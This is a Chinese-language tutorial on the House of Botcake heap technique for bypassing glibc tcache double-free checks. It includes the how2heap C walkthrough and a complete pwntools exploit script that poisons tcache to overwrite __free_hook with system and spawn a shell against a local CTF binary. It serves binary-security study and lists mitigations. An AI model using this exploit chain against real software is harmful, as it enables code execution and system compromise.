House of Botcake：绕过tcachebin保护的堆利用技术详解<\/h1>

1. 背景与原理<\/h2>

1.1 tcache保护机制的发展<\/h3>
在glibc 2.27版本引入tcache机制初期，tcache几乎没有保护机制。但在后续的2.31版本中，加入了针对double free的检测机制：<\/p>
当一个chunk被放入tcachebin时，其bk指针处会被设置为tcache_key<\/code><\/li>
每次程序将new free chunk放入tcache前，都会检查它是否已携带key值<\/li>
如果检测到已带有key值，就会产生报错<\/li>
<\/ul>
1.2 绕过tcache保护的主要方法<\/h3>

修改已进入tcachebin的chunk的bk指针处的key<\/strong>：直接修改key值来绕过保护<\/li>
修改已进入tcachebin中的chunk的size<\/strong>：使其被再次free时进入其他tcache链表<\/li>
House of Botcake技术<\/strong>：利用合并和分割机制绕过保护<\/li>
<\/ol>
其中第一种和第三种方法在实际利用中更为常见。<\/p>
2. House of Botcake技术详解<\/h2>
2.1 基本攻击流程<\/h3>

填充tcache链表<\/strong>：分配并释放7个相同大小的chunk填满tcachebin<\/li>
准备victim chunk<\/strong>：分配一个额外的chunk作为攻击目标<\/li>
释放victim到unsorted bin<\/strong>：由于tcache已满，victim会进入unsorted bin<\/li>
触发合并<\/strong>：释放victim的前一个chunk，使其与victim合并<\/li>
重新释放victim到tcache<\/strong>：从tcache取出一个chunk腾出空间，然后再次释放victim<\/li>
tcache poisoning<\/strong>：通过合并后的chunk覆盖victim的fd指针<\/li>
获取任意地址分配<\/strong>：通过精心构造的fd指针实现任意地址分配<\/li>
<\/ol>
2.2 关键技术点<\/h3>

绕过tcache_key检测<\/strong>：合并后的victim chunk的bk指针会被设置为main_arena附近的值，这可以绕过tcache_key检测<\/li>
合并与分割机制<\/strong>：利用unsorted bin的合并特性创建重叠chunk<\/li>
双重释放<\/strong>：通过精心设计的释放顺序实现有效的双重释放<\/li>
<\/ul>
3. 实例分析：How2Heap中的Botcake示例<\/h2>
3.1 代码关键步骤解析<\/h3>
\/\/ 1. 准备堆布局
<\/span><\/span><\/span><\/span>intptr_t *<\/span>x[7<\/span>];
<\/span><\/span>for<\/span>(int<\/span> i=<\/span>0<\/span>; i<<\/span>sizeof<\/span>(x)\/<\/span>sizeof<\/span>(intptr_t *<\/span>); i++<\/span>){
<\/span><\/span>    x[i] =<\/span> malloc(0x100<\/span>);  \/\/ 分配7个chunk
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>intptr_t *<\/span>prev =<\/span> malloc(0x100<\/span>);  \/\/ 用于后续合并的chunk
<\/span><\/span><\/span><\/span>intptr_t *<\/span>a =<\/span> malloc(0x100<\/span>);    \/\/ victim chunk
<\/span><\/span><\/span><\/span>malloc(0x10<\/span>);                   \/\/ 防止合并的padding
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 2. 填充tcache
<\/span><\/span><\/span><\/span>for<\/span>(int<\/span> i=<\/span>0<\/span>; i<<\/span>7<\/span>; i++<\/span>){
<\/span><\/span>    free(x[i]);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 3. 释放victim到unsorted bin
<\/span><\/span><\/span><\/span>free(a);
<\/span><\/span>
<\/span><\/span>\/\/ 4. 触发合并
<\/span><\/span><\/span><\/span>free(prev);
<\/span><\/span>
<\/span><\/span>\/\/ 5. 从tcache取出一个并再次释放victim
<\/span><\/span><\/span><\/span>malloc(0x100<\/span>);
<\/span><\/span>free(a);  \/\/ 关键的双重释放
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 6. tcache poisoning
<\/span><\/span><\/span><\/span>intptr_t *<\/span>b =<\/span> malloc(0x120<\/span>);
<\/span><\/span>b[0x120<\/span>\/<\/span>8<\/span> -<\/span> 2<\/span>] =<\/span> (long<\/span>)stack_var;  \/\/ 覆盖fd指针
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 7. 获取目标地址的chunk
<\/span><\/span><\/span><\/span>malloc(0x100<\/span>);
<\/span><\/span>intptr_t *<\/span>c =<\/span> malloc(0x100<\/span>);  \/\/ 获取stack_var处的chunk
<\/span><\/span><\/span><\/code><\/pre>3.2 攻击流程总结<\/h3>

分配9个chunk(0-8)，释放前7个填满tcache<\/li>
分配一个隔离chunk(9)防止top合并<\/li>
释放8号chunk到unsorted bin<\/li>
释放7号chunk触发合并<\/li>
从tcache取出一个chunk腾出空间<\/li>
再次释放8号chunk实现双重释放<\/li>
通过合并后的chunk覆盖8号chunk的fd指针<\/li>
通过两次分配获取目标地址的控制权<\/li>
<\/ol>
4. 实战例题分析<\/h2>
4.1 题目特点<\/h3>

提供完整的堆操作功能：add、edit、show、delete<\/li>
存在UAF(Use After Free)漏洞<\/li>
存在堆溢出漏洞<\/li>
实际比赛中可能条件更苛刻(如只有一次UAF机会)<\/li>
<\/ul>
4.2 利用脚本解析<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span># 初始化<\/span>
<\/span><\/span>context(log_level=<\/span>'debug'<\/span>, os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>)
<\/span><\/span>p =<\/span> process('.\/test'<\/span>)
<\/span><\/span>libc =<\/span> ELF('\/lib\/x86_64-linux-gnu\/libc.so.6'<\/span>)
<\/span><\/span>
<\/span><\/span># 功能封装<\/span>
<\/span><\/span>def<\/span> add<\/span>(index, size):
<\/span><\/span>    # 添加chunk<\/span>
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> dele<\/span>(index):
<\/span><\/span>    # 删除chunk<\/span>
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> edit<\/span>(index, size, content):
<\/span><\/span>    # 编辑chunk<\/span>
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> show<\/span>(index):
<\/span><\/span>    # 显示chunk内容<\/span>
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span># 1. 填充tcache<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(9<\/span>):
<\/span><\/span>    add(i, 0x80<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    dele(i)
<\/span><\/span>
<\/span><\/span># 2. 准备隔离chunk和\/bin\/sh<\/span>
<\/span><\/span>add(9<\/span>, 0x10<\/span>)
<\/span><\/span>edit(9<\/span>, 0x10<\/span>, b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>
<\/span><\/span># 3. 释放victim并泄露libc<\/span>
<\/span><\/span>dele(8<\/span>)
<\/span><\/span>show(8<\/span>)
<\/span><\/span>libc_base =<\/span> l64() -<\/span> 0x1ecbe0<\/span>
<\/span><\/span>free_hook =<\/span> libc_base +<\/span> libc.<\/span>sym['__free_hook'<\/span>]
<\/span><\/span>system =<\/span> libc_base +<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>
<\/span><\/span># 4. 触发合并并实现双重释放<\/span>
<\/span><\/span>dele(7<\/span>)
<\/span><\/span>add(10<\/span>, 0x80<\/span>)
<\/span><\/span>dele(8<\/span>)
<\/span><\/span>
<\/span><\/span># 5. tcache poisoning<\/span>
<\/span><\/span>add(11<\/span>, 0xa0<\/span>)
<\/span><\/span>edit(11<\/span>, 0xa0<\/span>, b<\/span>'a'<\/span>*<\/span>0x80<\/span> +<\/span> p64(0<\/span>) +<\/span> p64(0x91<\/span>) +<\/span> p64(free_hook))
<\/span><\/span>
<\/span><\/span># 6. 获取free_hook并写入system<\/span>
<\/span><\/span>add(12<\/span>, 0x80<\/span>)
<\/span><\/span>add(13<\/span>, 0x80<\/span>)
<\/span><\/span>edit(13<\/span>, 0x10<\/span>, p64(system))
<\/span><\/span>
<\/span><\/span># 7. 触发system("\/bin\/sh")<\/span>
<\/span><\/span>dele(9<\/span>)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>4.3 调试关键点<\/h3>


初始状态<\/strong>：<\/p>

分配9个0x80大小的chunk<\/li>
释放前7个填满tcachebin<\/li>
8号chunk进入unsorted bin<\/li>
<\/ul>
<\/li>

合并阶段<\/strong>：<\/p>

释放7号chunk与8号chunk合并<\/li>
合并后的chunk的fd\/bk指向main_arena<\/li>
<\/ul>
<\/li>

双重释放<\/strong>：<\/p>

从tcache取出一个chunk腾出空间<\/li>
再次释放8号chunk实现双重释放<\/li>
<\/ul>
<\/li>

tcache poisoning<\/strong>：<\/p>

通过合并后的chunk覆盖8号chunk的fd指针<\/li>
将fd指向__free_hook<\/code><\/li>
<\/ul>
<\/li>

获取控制权<\/strong>：<\/p>

通过两次分配获取__free_hook<\/code>处的chunk<\/li>
写入system地址<\/li>
触发free("\/bin\/sh")<\/code>实现getshell<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御与缓解<\/h2>

升级glibc版本<\/strong>：新版本可能引入更多保护机制<\/li>
加强堆元数据校验<\/strong>：检查chunk大小和位置合理性<\/li>
使用安全的内存分配器<\/strong>：如HardenedMalloc<\/li>
启用额外保护<\/strong>：如FORTIFY_SOURCE等编译选项<\/li>
<\/ol>
6. 总结<\/h2>
House of Botcake是一种强大的堆利用技术，它通过：<\/p>

精心设计的释放顺序绕过tcache保护<\/li>
利用合并机制创建重叠chunk<\/li>
通过分割操作实现内存覆盖<\/li>
最终实现任意地址分配和控制流劫持<\/li>
<\/ol>
这种技术在现代堆利用中仍然有效，理解其原理对于二进制安全研究和漏洞防御至关重要。<\/p>